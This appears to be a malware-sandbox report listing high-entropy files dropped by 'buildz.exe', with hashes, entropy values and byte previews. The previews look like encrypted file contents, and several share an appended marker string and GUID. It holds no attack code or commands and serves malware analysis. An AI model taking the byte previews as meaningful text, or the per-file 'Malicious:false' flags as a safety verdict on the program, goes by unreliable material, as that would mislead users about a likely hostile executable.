                        Preview:<?xml....!`...P.%.hTy.wGy0......$...M...n..Z..........A..iv...&..Y...g.|.j.....w....;.i.Q. .[.Z/q.S'.)Fh.I....4..3".,.1u..h..:.g.;...:.Tp......N..@D...J.....a)..........E.".....my.h...a.@..&b....V.fm..XoM....G]...D|..0D^.,.#...."..Z~a....=.........Ha.q..ul.-.Rc2.u.|."g.@..........Qra.*.H.._.6.:.qH:!..xN%'.=L..-.._.l........!.zF<.e}:^..D*;^@.......z .]`...K.`Z.cod..x..*........D....|.0...?.....IG..w'.. Hse?;... .m].....&../....0.O.....u-(..kGN@c....e..._..j.zb.K..zg..)[.~.....C~.;.Rdc.....@.x..T....4]G...[....w.K.Z.EP.~.=....G.=..=.(R6n.........IV<..2....p....._...+.......oX..l8...URP.D..D|.1.[..-r.....3t.b`i03.Ra.....x..n._..L...!.....bO...q.y.9O9a?q.$.M.K./uR.-i.w.ch......Jh=..,n........'.....v..<..p.}..S..V.a.A}.oy..8.(...|......@..C.Y...;.w...v/2.ny....@...A..Br*I...T..o|......_.......c.5..0...x..`....P.-2.9.B...,R....G.[-..d.+.jls..9E3.A...l..T ...!....?\........A.i...T6d7.....O.......Q....w.N&.'....M...K:.Sj&..(k..EX...e.?-...X......
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):903
                        Entropy (8bit):7.729475162792322
                        Encrypted:false
                        SSDEEP:24:+BD9jogQvIfOlt1PvX4HguAMMLqjrxZmX4QGbD:ujF4Ifw34HguAanfmX4QUD
                        MD5:E47738DE2DFBF5D48FF7C32DF78DF151
                        SHA1:7CB7B8ABA98AE68E3A6D0AAAA14A805A6F1A565A
                        SHA-256:EDDE7BF7C6FFF109D4351EF5B04DD310D499A21E12373D60A53692F28D532266
                        SHA-512:252AD7A1810D327ACB00C0F8FB5CBAC97B1DBF7AB1431FA17E748F789AD5CE8FB519D627AA84296616F311B1CE5CD500D6F3ED20E3FA15671616F65114FA0493
                        Malicious:false
                        Preview:<?xml.Mc.D+.......z.\..R.-F*..1...]...J....w.3...=tA.P.D....Fm._.""oL.A.sWF....8'X..B...h.%..wLw..W...[".?'j.q..MY..P....v>.@a...am..y...U."..l?...!.F. R....y..UMj.`..........|.#.7.2......~...0....$...E...O,...).,f..M.1.~".~.-.m`.;...e*..#...I..U....Iz.y.B*6...=......9.W..[.Y.x....3~%..K.cY..A<....[.E....Z"....$4k...\..C.@J...$.s...#X.+...X#.).m.o..F.......#@.9(.PJ.KR.6~.)a..8...nVA/qx5.S..!{.\...:h...Dim..9.o..R<......n.l...H.....J.. ..[..B..0.Ja....xG.. .....[........~.!.......J.?."@..2....xi..d.l.C..<U:...G.R..S.LiD;%.8..IX*.m.....l.#X...M.uh_(....g.0)._..a..Y....r4.E.e..p.w..)....].r/.LE.b..BI1.Q.*..:Q..X.../1..".6.OX[J..?..o#"..-Se2...8...*.D..._..P$..z-...w<O..X.{.G..n....$..{.&K.Y.....9v..1\.z....k.8lH(.Nh................s....v....}W..x n.].E...-.....y_>.=..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3566
                        Entropy (8bit):7.944472081478218
                        Encrypted:false
                        SSDEEP:96:E1J4WE+7IFLvXGaBtVVM+IbTx1mMKAzS4r2B7A:0JE3Lv2MM+iHzS4M7A
                        MD5:846E538DD0B87B2DB73093A684F5E877
                        SHA1:8D0BC43BDE05B37977ED1028B7E3722D465F477A
                        SHA-256:9B9B9C0F480730BAF1803FAC91C0991094AF4B4B4AB01EA4AA9187CF8D5243D3
                        SHA-512:2E22B4F45B07C91E69BA8D330ACECF077D0800A38CF0C22FB90DF6664BCEE1CEBF6227729624A8FA02822815608D4D0D5756234BE3D938A805E181850B880099
                        Malicious:false
                        Preview:<?xml{}.E.te..y...:.X.&...t.>..c...).y.z.,8..u...:..e...J.....P>.j.4..@y.$.?..C.|.*.}...W.^G..ii...uV...T.-...iO..%..eKT&.....b.._;Dg..K\....5".*..o...'PE[..W..L.&..H.\+.........m.Fu....(....c[W^..Aw...c...,;T.o..q......|.!..&d...>qi.E.,..i:..\..;.|.b'.kAP.{...........a...KTS..n.8:.;.v....a1..E..*.+.....[.<...2z.D..t..g.....3..P$;C.>...5B..[0.+%e\4...;....A....X..<`.._v]T....d.....rY...5b$.-......E...U..0..W.SD.J..@........"..B.7]G.0H.vG...;$q.\...-.<..B..X.v1v.#..&f...w. r...p........7..j.T.<...(.Z..5.$..S1e..s.Cg.Y....8..Iu.1.-.....|..u.L.Ta.....5.WH..s.IL.R...v...o..x.X../.5..xKii..W.%....W.s.....M...i..M...y..)..h&.q.^S!>p*.....-*....j,/...(g...i. ...>.:*....3..R.....p.q.....}[V...4.F.x.u.....R.R..1....$.s..;...9.....J.{..WP.;.....xYe<B2........n.q.......i7.....F~~}..oN5.Tu...v>..X]'f..>9..G..\=.$L~..R....h.!...%.~..A..".XG...y.a...w..x.$.....j....p...,..h`.EZ.p/.Bt..I..`.FP..>.Xad.....R.9.....p.:?.-0a..|.H.+...>O...i.V.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3677
                        Entropy (8bit):7.948508711066829
                        Encrypted:false
                        SSDEEP:96:LTvf8iBvzpWhLnC4qVPWkFwojpERQ2r6BGA:L78iB7Ay9wqiq2rWGA
                        MD5:6A603F501AE2AFFCE0E742E8C37D203D
                        SHA1:3982C20211E8A273CE0A486509E3AC42EA89983D
                        SHA-256:A4DEC76B1521F0E26DB17CE193A68E50A8151A44618B9AE9ADA7164FC7304212
                        SHA-512:6D1C7A8640C08CA1E678A0464CF3E72DED8E2DC630147E0D7D069DCE6A6E87651ABD8499355E4F6FBF2A07CEA27F574CBA978B1E498E1133BD316F3092086931
                        Malicious:false
                        Preview:<?xml.......pc):<..q.k%...9..<{..}.6/`.+=.....L..G.o._f..<.S.bQSoC...T.6..W..$...C. 9b+aE .ji._...GZ+.EX.a&.y....6...%I.9I.CZ..E.v...p3*wED .....5.I.....C.<..I..."5.,..{\.1....Sh#".S...1 ..?...;...:..~..W|-..f..{&..&5...pn.v..... ...;..R..Q.?d.<.T....P....F.q.hS....%.tK.L...S.E.v..6.b......B...........;)...I.3......l>)..,...L..h...L.|.|..^)a.J@@._,..6..#.l.....3E>..I..(,.,.~...3$._..hw.2.....D.=..*..$..h.`b.C.../.WU....<.".U...6H.@H.........%..8a.p.3.\...76.+|>.>...wF..%.#.(}..n...e..6OF...v..-.jM.._D..#..JrE~.S....j...WG..e]..|..&.|>.T.ISS.wF......"S.oj.tb....OS....)nr..3..}..l...3.V.|..g...q......b1./.<B..".M..U5..x7...=D.@{.. ..q.W.......4..U.{T.D_......k....b~..q_....X...o...h.W]..H..._.Y.D.....[..Y=..Kv.T.).....#^.R1........:......5./K.9....ug(WK.......e...u...C.8T.|=....Y..].5...d0.....h.5.v.R:<..[".!S.......+}..k9.......t..c.....~d"b@.....@.a...@...H.L.q.&.bSk....+.....6u...g^.et?..y.%..... .xk...U...C{/.I#.m.....XxV...m'..R./...9.!.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):744
                        Entropy (8bit):7.678612986494703
                        Encrypted:false
                        SSDEEP:12:U1KD1PWUs7/WMwMp8C+TQ5Zgbbn3cCrJHRb/qjh/3Hu3YgFCtT3LVP1bhxg526GX:S0oUsqMw7C1SXJHRE9XfAkfbSGbD
                        MD5:87F16077979EEC62A15C7A09C952A46D
                        SHA1:39B8E9D255589D0D6FAFD4048813569830142343
                        SHA-256:81B367A9A58AC1CFC30A684AAFD53F61D5038EEF921B8F12FA87BE3FD433430B
                        SHA-512:F98817A5EBF814B629ACD0548965E02E4C2FB3BE0544D87F36B3F97A217B7298A55027FAB74AFAA8532B87522BEAFB4AC0B827BC859D0BB96A928B83DDBB7F80
                        Malicious:false
                        Preview:<?xml *sC..gf[o."...'.q..X..y.m9.0..h..+G..l...R.."..a..5K\.......maY.....#..R..7L...El..*%.IJ..o.z....C..h.i....:'.E;t.0...g..N%$.Fet]....>.G.^2.S{5.A.S.....).r..E{$.s ....%[..`"<...1">s:......1.2.<.~A.Kg'.n....h.KE..G..sS|...x.......[J.(....".-.........}....9.S&v. .Y..X.Y..n...>.p...8*gn...C..N...x'.,...*...fcy.U.p.\..x..I.....+*....^...........&....._.>.]..1..}..P).E..Y....;.-..``..u.e.&.d*.~.y..+.@../M...d..e..=J..'.5F.^S3.3....A.u...}..X)..."o.m54#3.p6"...L.!Y....Q.`+.... v...=.9)KL..&1..;..e..!..V."_........ip.d..i...*F.7w.....,nD....D.........v....\5.n[...l.I...K.l..'.$Co..Q.p~f...Se.` ..p..;l)........%.3...EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1620
                        Entropy (8bit):7.87264470830918
                        Encrypted:false
                        SSDEEP:48:yraEiSk3UThHV+ta5F4DQ+u9JMCQDhBX7zh8UD:yrVk3EhHwtQZ+u7Q/7N8A
                        MD5:2710B4CDA358C1AD376798ED28BDFD08
                        SHA1:4AA8C242243AB846628E2BBA76CA002B6304C04A
                        SHA-256:3E5460F7EE3268410FF6F4734E26AA09C526535A1C549869E60615EAA6D9DB74
                        SHA-512:FE86AA8268D2A3D92F0D8D907F3654836D947EDC5DDE151BAEFC8B4600488851648D5EE666FB9BD7DD8D440A58C603DC13E9CBC7B929B95D752D91457DD28847
                        Malicious:false
                        Preview:<?xml.*b....j..z..48...n.u..N.*...y.p.>..hBu...|={."..Q.jsK:...YyA..X..ln.K..*3.D..^._..F..Cz.bRr...v]...p.Nj.{..........r..e.k...zK=...6\........!..).0....rX..r.5..Y..[...<..Fb.d..[.1<O..{.......s.S.'.l......`..Dg.BaN..0.Q.........u.6l.0...bO.nu&)s.3...f.p..L`..0?.....k.I.....U......@..,..;..(.%..2..3I\.,.....*y6....{.K..L..G.o...a#..=".,.Ycm....K..G.w..~FL..!.fT.3....x...9.u?...7.E.b.....m_y.3P..xG..F..S*.tM..[.....j;..tCW.1.......v{<..h.....W...p.....>W?0.e..B.'$...$.....2...=.dU.j.Z...V..1w.g.i.;2...... P.f....M.....f..;.{.Q.....2......^h......f=T.>...C.E....on./Y-.....z..B {n.5...WF..W.@....y&H.0..[.U.2....M(...>..O..y..v..K3..<.c.-.M.$.'.qZx.....y.3~...E.....4P.XP.. .c.............yU.2zD..D..5*...H........8.x.....HL.P.6..1...._.VCG".....A...'...K.....[(#...{..$....{.j.{4....|.p/.k.s.w.;6\.P.m.]P...Y...K8O......u....9....u..H~,..E<......O.G8..I..........Bi#kl.j//m,@...0<7..y..N.6..]J.|.$.;l....>'h.y..B.L]..2E.X...].a.C5..=...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):821
                        Entropy (8bit):7.726013937879908
                        Encrypted:false
                        SSDEEP:12:WQGU85NoKeCXndyVGxtd0/ue6LZi32mNvLQkJdrBZLngGVPPVkFEwcEUHYlUE26A:WQGAKRdGe8l90k79ZLngqH6UBmGbD
                        MD5:59324D1B976452DF732799B2CDE79F33
                        SHA1:8665E1B82AF5EDE8E525A792AE5BA714E3779FF5
                        SHA-256:592A6B156023AA5D3BBC157E3E601F8249103DB54A6663DB7AC17642A0B1CE3B
                        SHA-512:1598E4DC4ED349A7B45A77B91540194A99FF8D08279940C7E04B3F369860E6F04A4953DEAED0ED503692D580551F66B7E0BA2820F53F5DB642138A8BF2134A16
                        Malicious:false
                        Preview:<?xml@.......W%..h..J~[_B...0.|LS.<.1.m.....9..w.....f..&}.,i....%K.W......qJ.....{....n0.....6{.Pt{-3.{...).>`.4.r....l..x(.......s`..e..0..Q....}...:.h....?~[.c7BI.SQ.0.....mr&...L.Fz.._.I...d....Y..!..\.l.K..8`x.-...:|x]_D....c...TR.n.0...)Q.c. ^..n..d.....}.....1..q-..Y.Z...../......._...IL..,G.Gd......\....As...Y;D.9,..W.X..`..':@..[..X^0&..ETb....N...T..$}O.I....I.....L.(...=.o.Y.M'........It.../.sT.->..=.B18.#0........ts..=..t1...|#}..'.n.\._..j.A..c.r.p......?-..}"c..a/.HDD.e`..9...%;f.FiK1=.-[..4......~N~...e..[M.....N......m.K..4k.A*.......r...7...?....a.dC0Em..[K..k0tM...?....5.s.c.. ..b..#.....e:c. ...M..W.R.T..b....e?.2..e.0.......>..V..Cb...v.x......~.%.......0lA..i..w.C+gE..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1034
                        Entropy (8bit):7.748343419409993
                        Encrypted:false
                        SSDEEP:24:i7UqLbgD3M5KHBZ+FuSNvjSCGx8tm4AQLr2hw8/bpaacY36GbD:Jw8D33bj++CGxKm4A08/bp6bUD
                        MD5:2AC75216532B2A38909DEA7B23D60215
                        SHA1:024D86E56DC3006491C45B97C3F445F15EA965B1
                        SHA-256:0B6D446C72C4FC42AF310228D1A091FB5E8CA3D11B438A44BB1D64C75390E2D9
                        SHA-512:9D53E3E55065B74CC46EDF831F2B6C10909793A3F5DDC918CD652772FF68BCC07B34A5EB1189293AFE0A6F851E794E33D7A460B523C300C398CA3DED82E2F32E
                        Malicious:false
                        Preview:<?xml.&...8tH$..e..&<..v.992.F.e.r...;...q.h...75.*....k8I.4.2..&...".....m-.fW0w....>..47..].0.p.T.Z:...R........mD....u@..U.).......w../cN...6.a......W..-_.......J.o....=.e..F.......)..p^.,...`a.S.A.8M.*....<.sC\[...l..#.w.....2lZK.HD.m.....?].K.YF...v$X...A.vM....Zd-.+r.4..._.c.l...J4.0jV....m.(b..v.0.U}....Bp~*...q2.EE.e.r..}-d7)....R.g.uQ..&............zx.&..b......<?P....6(..B.:..{a.G5..-m..l1;V.?.".8A;....EW#r...\u.....p.1[..*...wo..1...j$B=&_..(.L..&j.......5.eU.l.0.q.9A..\Ge(.L..S.E...U.Jl......d..P.r.P:W.V.Y-4....#.^T.......H..[*.-k=.2WS.3.;.R......=..K7.V......Z...,......W.A........+t.?.YB....]xj..,6"g.F.I.V..3.X.}x#;sS.u1(5.1Q%6...U.@J.k...}.......8..r]....U.-...\K..E..U....9Qd.5..~Q.(..q.!.w&.$...i.1...p........{P*"...4.PT.}a...a8.A?V....j..D.F.&..WyY..f....w2C.T.b.....s..+.z..S4.f..>K....sP..*6.........(.7.%.).D....Nso.Y..$E.,L........6.P...sEn.}./X......_J..T....g1...J.........>.A.{f.|...\Z..H.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1333
                        Entropy (8bit):7.8378854476727335
                        Encrypted:false
                        SSDEEP:24:X8wJJ+CFnLWZCsvQ4ihlImcCtoCyH9zXxhaoqmEKEXLQrZUHTwatEB9GbD:xJFLU/4hacoCIzXxhXlEXMrZUHSUD
                        MD5:C03C8F9B7D886A6FD365723EE7E75621
                        SHA1:3C1ECF5F6E1A5157D2BD9665B9764B218CFDE2E3
                        SHA-256:06A48E644980BFD82504B2F53D88564860BFA773910F8985C3A319483208A123
                        SHA-512:0EE21E59A934F6D447A8D862410BAF4556C5D7B7E59D5C3E8D03EB0960D5CEA4B3B27E830560BD0D4DE9BA8AA6734BC90F9CF5EAF396E6207BDD4E0DE1FED7CA
                        Malicious:false
                        Preview:<?xmllm#.{ehR$H....D.@..N.y..K..(.....S..|*.tK3}w.h....JuY{?.N6..!0<..O..?[.E2e...+.8.Eb.......E_....._.....lQu.e...s...g....&L"ft..!.U.35..W.>/.Zp.q.W....#...?w.^ ...Mbr..q.9<....l..=./.......g..Ul...3./..I$..rBH.(..d1..k..;.'.}M.....^%.j...pH..JX..........m.a.d.._..>.6...5GJ..|...k..b....aEJ.>...).......t.GU..O.x-..H-.Z....`.:T..|c..?.M.?k....]..%........p.)?.o0..8..Y.....s,.~'...U[.S.....]?.J,....>.?_.d.... .|..b.j..vWr.......u.9.......b. .....f.e]jB.E.....q/...]..m.rd..~.R/.%Z...}...cr..?5.ph.6...^x.t........'YUP....Oo.....iRl........8....Dd..Fb.../J.Wz..1m.b..1....;eL.o.Y..b...Dq....=cC.....gc..........L.e..w....V..b...'.FY........gn........]......R.T%~..N......ho..L...1.&..T.....1y.f.O.Q.Zu..)..O.$....8=..! ...r;. $.L>.]v...;...p.^...].M._..>..#..U)({....~.......9..:...,Q...'..[.T...U..>cR.....Y.z>..]+...F.P7.-..,..Fc....}.o72&.n.W.i..h..|....:.D}jO.M.9xrI...A.r.q.."..f.=..]...@.).nm.4Y}Y..2.......p.j.....%..7/*.r<8=.&..N~..p..jt.'.....>3.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2514
                        Entropy (8bit):7.936427149437735
                        Encrypted:false
                        SSDEEP:48:FYj7Cela5D9Tgg6XdNFb/FIUMqWzqLMi5ghLeuDpiNx+CfkldLUD:FYj7uCNBFIMLteLeipQ+C25A
                        MD5:CF70EA48CC53AB191A45A0AAA06CFCDC
                        SHA1:B84577A9CFCC63575D015C0D3B8178335F9791D2
                        SHA-256:324471B6DE1BFB6E8A0B664FC19A88FE23D475D0BBFEDC60033AE3BC4A78D5F3
                        SHA-512:58CA91CF7E23EC833B8402A13648A2F33696927925B52BE2406BCA123275978CC1AC72FFEDA48C915A99CCD7EFA5B80EE70DC04C3C4BFE167588009643FA4948
                        Malicious:false
                        Preview:<?xml75(3.#dCK...W-It.f.KZ...../.Kx....;.... \....n..g.....^..G....k9...0..&..^..F.....T.....d..\.[.e...e.R.'..3.C.W.H`:^..t...W.(..R....oB.r+.-Z..V.%)z..oB..:.R.U$..bND..0@Q.r......v$.#0.x........sq..[....T8..Hi..n ...*_rOE.....}...+..K.<...O.D...^...4pL.&.....|y.^t;.P..w....*/..z^ 4.R..@.d.\..w.iI.{?b.NC{&.&#.9O.!(...nd}(.<hN.D.~..D..\......N..STL.U+V-....H.'X.B....q...P.3......\.............BQ.......>...9..&....!..b}.Y...:.."K...v7....#.i......%8.w.....~C:..Ym.?(lT..(.....VY.8.'`..x..6).F&r...v..-v...........C..&....k..|p@-....."4-4[.E.8Y...UX..^4k....AU.~.....P.c..s...bo..p5gc.;T......f1.3.h./.%........51.j.%...7M...r....`R..u.....k4^.o.w..,._...1@Zs.G..Z..K....uH.....!..qpLlh.s9;.;.EX.U_.5K..R..X.(..R.....>1V..Q%..kv..u.........\..j..m.......K.J.Ds*8s.3..D.-.6...F......5.f.....I4..+..MF....^.J.L....X...w.>...U..f ,.!..z=...MB...l5...j.........=Ne.6.gYV......R.."...O..h...Xy..Q.8.. .j.Z..E.?\G.&.83.7L...XhMjv.._[...f....j..fk
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1346
                        Entropy (8bit):7.823238244679119
                        Encrypted:false
                        SSDEEP:24:PC0eTlaA71L0GjNU2U8doOm6o/RJr9tBFFslPsQczwDSx0wiOasGbD:P7Wog/K38doR6oXrtFNrUD
                        MD5:052E14184990D682DB131E6290C0E883
                        SHA1:63BBEFFE76A118743AC08C380BD5EAE39260A9EC
                        SHA-256:3BFED24C11200A0DAAA72ACD9B7FEB8BE3215914D8E15A3965391E0C2F7C634E
                        SHA-512:059E15A6028EC6507548C589FDF26D47C7F899BA852F9CD061F2314B30CACC1E437FDF2D023FFF4BC0E75B43407052F5A46840F7BE91C54104266335C39585D3
                        Malicious:false
                        Preview:<?xmlH..eK.-..&^R6.1..n<..<2..;...U..J.B.fX.....'-.&.m.^N.X..<.1....A......9........o<..-9?-.,..lxZJ..II.{.....S..Z...V. ......F....e=4. ..j..i...t$<1.F.2..?.1...61t..A.."..?...;..X..)...o...;.'Ho.o=VR....h.....4}.Wg..F.l....u.M.......@.9....`nD.}+m\O...+0H...t.X.c....}..n...\./.......jq......X~.M...?\.-..w....0.=...3.@P....Y.@...m....?.6.`........;|...y....M].....BLU..X../k.h%.....%3E$-t.c..z`..pg.|........Q#..7k....;....H. .%..8...<...Z.......?.|.c),/a.....y`.-`.o..T...V.........[V,..0...$...'.1..p..N...Sd3.x.W.N..Y. Z..Z~^.0..u...N......FJ..].9._.d.l.2.a;..Mr...w.u...J......K.O....d.4..y.MQ..S.Tw......!-....3.RoA...4....I.X.w.C..E....3m.ml...y2....p..B..O....5.....H. 0.j.....H`F..*7."....B..5.'..)8a.6..G.....9n...mD......?......"Q/.5.*s.(..;........^.$gi[[....C.......j.wM......b..M.,v.hx,1.......;,.....H.^.....G.}!..z..aw..y.d?...^.^.+.(t....&.....L|....v...Qz9.f.)..M..a.=...N....{x.|W....P.<:.;.bc3....`.i.Gu Jo..{.1..z(.....vnP..!.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1041
                        Entropy (8bit):7.828620182283592
                        Encrypted:false
                        SSDEEP:24:AIsKcfLHQh9Xz8vORu+btKVPnf+gNNGsdAA7ug06JLlFjzGbD:upfzQbjK+u+pKVP2gNH7ugNNrzUD
                        MD5:F86AA964B81A455486DDB7236CA0CF88
                        SHA1:4AB177DE02817CC835829DE7B094D29181E21E6D
                        SHA-256:072C48D24C1603E988A438A1B9EB7BF0844B8E6451C6457195D794664533095E
                        SHA-512:91B6E35223F6DA2B3ABB1B079260463F971055C81494B54A61D36F296D3050BE07E121FCB82F6702342D9D2E3E922836609730F2AB3572C7BCCB41A2CC3386F9
                        Malicious:false
                        Preview:<?xmlk.k......,.P5..;[.y..........{~!.G.*..~.QT....e..x&.....mp1.+..........|O.... 3.53-\....K:<....+-k.......O.f...:.K..h..]..e.......A.V'2.M!..}...u.`.....'.8.eg.X..r.v\....0/'(...c..q.^.....6...)..zWTF.^..........I.x.Po$.L)........[.2..p[..q.L.o.d........b.^.....y..7.f..D....>u..U..........%......7.3..|...HK.......>...aC .<....x..[7.......X-..2AoU.....=#...-...........B...XJ.l.....?w`.GP...t.D.....?...$ z.e.Uk.e.8A0o....W..H.@{.@}c..W...i..F`..j.1.....l... ..)..I.b...>^.a1.4....N...c..~.......-...;.<.UpA..,..(......P.{../..B_.N,t.....{....s. ......U.h..e.4.{;^..z.S..n!=..*..3P.d{.O..m.!+gY.`@...r.........a.@....o.o....S....-..7..7i..i.r]...vDL...= 2..f.N5.cp8_.}P....9.e.y..Q&.........u......R(2..0L..........(C..b.P.p.v.^...foC.... .....E....Tw.l5..4E...oC.B-Z.M..X.....xc.,jU...T{.k...=%V.X<....,:...?N!.d......n;....7.j..>.f...pP..(.A.....M.hZ.7.r.ly*>...[._.bV.$w.N......+.pG.K..."_MY..(O...xEdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WP
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1664
                        Entropy (8bit):7.876530734792482
                        Encrypted:false
                        SSDEEP:48:C98tFl+l6CrxGi/TFF0/9+a5xAxI3G0Dswi6fVsZydUD:CeFl66CrxGiZFI9++ieV46A
                        MD5:257C928B1ADB0490FB153FECFDE506E0
                        SHA1:DD03302A56291DBDB8589666192FC76902C49F6B
                        SHA-256:37FB120A98FE80C998FD4C63A8410C4168BCFFEF152B10ACF4A277E9CC8E4457
                        SHA-512:0FD80A1836243E9EF6AC5C2AD52ACB0CF34B13E2A18F277CE0FE0C96E2C1ECDE78B87FCC32A736D82142561826B9F76735BED77786ECF3E6309ADF45F6BD7C07
                        Malicious:false
                        Preview:<?xml....D,p.Y.~..[d...j.Ru...#.JB..$r.)........Z....8.g.g.5A9VOC*.z.....g..IZ.v?7........;L.4.o..&....R..U.u.m,.}8..I=...<..D.M5./+8...Q...:uo..nUv/..._nR...8.W.z.hxP.?>.!.Z...].R.7B.._...8.0...5.w....#.l...g...`..S.E*.5..>....5.*.uk#pRj. ...\....Z.T.%.A..DN.........?.~..x.../......y. BT.O.^.9p.].9.|.P.~H^B...7.N....n........|....D..c.nl...C..)...3~c.a..s.u%......._6...Z...l...y..;\.._;......(.`....u.....4.(...Fbp..'..T.F.mg.t....e..$...%:.....\rm.*Kv..-.Y.g......,.;..&...Y..7.G.:.a.vLUwN..g.6(.i.C....+pD..Y.S.6c..S;...m..Z....s'.vD...c.,U.w...$.f{.<.%d}.l[R..-....[kI..k(....Q]@..y3.._...b.+.d$_g.wY.b/6+.......t..M.@5....y.9...k..'$"..op.jH..9..pu...E..i4..U...c.li...3..k...!..Y..;=gDz......{Ol3.$P>.-.b..UIz..s...i.y.&+.-y..bU.HBf.>.C...,l43....l>.B.q...m.k;..,K....Z......M......C....$....\..y...n.J..`..*w/g..&....H./-..K..m\....!i.....q.!.E..Eq....`h.H..^3..S...%..d..2......[....(..+....D....S7.>.a.j.....#di.L..x".....-^.$..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1195
                        Entropy (8bit):7.803049686751334
                        Encrypted:false
                        SSDEEP:24:AbAh4iAWihc4m9VpSuSxD07kRd9nW39qVzU1sDGbD:2tWZdN0507kRd+9CU2DUD
                        MD5:EB05A5B27AA495E0DBBAFC282A2B06B0
                        SHA1:FDD0057291DB379451CA9138E6462598DBF5B792
                        SHA-256:4DAA6F69F69CD2566CAC0240E4B56CE955E309C4A2AA83A9A3F0E2436A25F848
                        SHA-512:7892CBE27B10DD85418CEE4F0E9D3E49891FF511DE71682807E4DFA87D91CBC5C225E1F67A83D4B8D3B856443CD0CAED74410FA72200DDA8B1997046A3CF296F
                        Malicious:false
                        Preview:<?xml\.C....m.?........\.qAz.JO\. I.j....;kj.....|!R..xu....Qk>..XS._K..jE.'.+.x..k..^u.6.N).j.cj.Py.6.u.0.c.{|3.H.3Jr:.C.F.WGnn&.......d.E.#...GE.`..B.....C ..]...i/...........t....'8R.........*C......%.pHj....&..*....Z.v...kXG....$m.>.....m...Z.).j.......$P>.:...I..u"8i..1*.oGJ...n..,..O^%.7|...}A..... ..f..w]|.X.e...H'..%...68..}.H5...xaH...@..?....>..,q..G.k..:....U..Bt...G........iv..A...+...Gk.....,-)...m......d|......G.w........N)j...p.F.q.[...0..q.....&....7......IJ."..Z.F|..I............t3..X."~bc._6qj"{me..*...n...C...[r^.Z.....$.q.VL..r.v...A~h..M..(.n.C.......D..sE..w.kV.a..@.^\....8.s..r...j.Xf..,....4..........o.!.....eU..RV... _..4...I0.Kt......)>..Q..m<..G._....CtuV...(.....6..sV..^...H.....YN....._MV..<.;...H.o6i........._@........_.qA.W.+.7.l....KY....ill.zWC.: !.../..B.;.E.~...B).U.t... ..~.z...QS."<kg..1.UZ..`.I...Z...g..m..._..P..W....q...o.....d....01&||8W.w..@ ...w>,.....s....KEo..S.p.V.`.p.]W).A..$.{{.@.{..l].o. /.{...C..0
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1269
                        Entropy (8bit):7.843693373840052
                        Encrypted:false
                        SSDEEP:24:JyUrnz10AyNrYMj2KD1AQ7MBlhkSvtpZjBe8NMQ+f/XJTGbD:JyUrZbyVYMaU+6MB7vvtpZjY8a7/5TUD
                        MD5:32EBAF7F76B4CE5656F876E2CD305B3D
                        SHA1:FC2729826A70BC8A665910C83291075558A727BE
                        SHA-256:000EE006C60BC58DBD88C23A79578C79652E3562B867D21B374290786509F489
                        SHA-512:170954EFFBAF4B11309D0941F1CB3A5301E6C8F11D0BB8FCE1B68F4B6CEB4E5278530FD990CE70EBF05FEA2451EDEFF996E77AA6FDF57E853EC124AF488428C8
                        Malicious:false
                        Preview:<?xml..b^..Q.....9..BZ!....f6...X.d.........>kS...I.......H.^..w8?.y..'NJ.N?.A. W..".${].X4..t..@..v....:+......Z........'8.A.....R.HY....R..fn.....=.sG.~..v.....".k8.-..{.2-...M7.T'.hh8".x.f........w84..Qj....:@.Z..].....Q.S....W...6..s...7dF.u.J..|.....6:Yo.V(..E.<T[.~...Y...=.n.+vb.?}o._.g...1.........r..P.q.?X......G.l.`dT#.F...yTV.....IfM.1..qw4.(...+i..'....UR.6..jW.X\.....y".1J.....:...{.T.U-....H...s....CwN.s..:.q...?.j..Y.U.......h6.PX;}.....i#.. .p.B."Im..k..M..x.f....'h*l[..wM.5}.P..O.<..o....4!..i..n..q...=.V.q.....R............t...B.g...U.3...o\.~.....c...'...\='....,.n..j.J=<..?..v....,L..}N.H.{+....2c.c....`?)X.#.B".._.a.l".1x.ex..<.%..^(O!`.....!".g.....V.DL....F..@...{f...Rb.qX/wS+..[Yk...P..n.Fz...]..Jx.n......c....S. ...b...%.,pF...);.'...i...Z~.....>.`r2c....B$...~.m..\.YE.....j..%...x..Q...Hn.2....`.N.aU.rC......}..Z.d.1.x.xn.B..D..~V.h..19.@..CQ........._.d......WQ...H|.#{k..*6...\.p$.(^^..{..E..E.....oRi8.^?
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1994
                        Entropy (8bit):7.8919152719186245
                        Encrypted:false
                        SSDEEP:48:/j1qgGgxZ8JvMoIgvw3syV9pHmfKPkjno5Oi8EIUD:/j1RPavMo9vwcMqjno5OiiA
                        MD5:32FFC0F5CB02524CA8A6DBE6952BC0C4
                        SHA1:DD9654972B8CF235F078683E9BEE154669011620
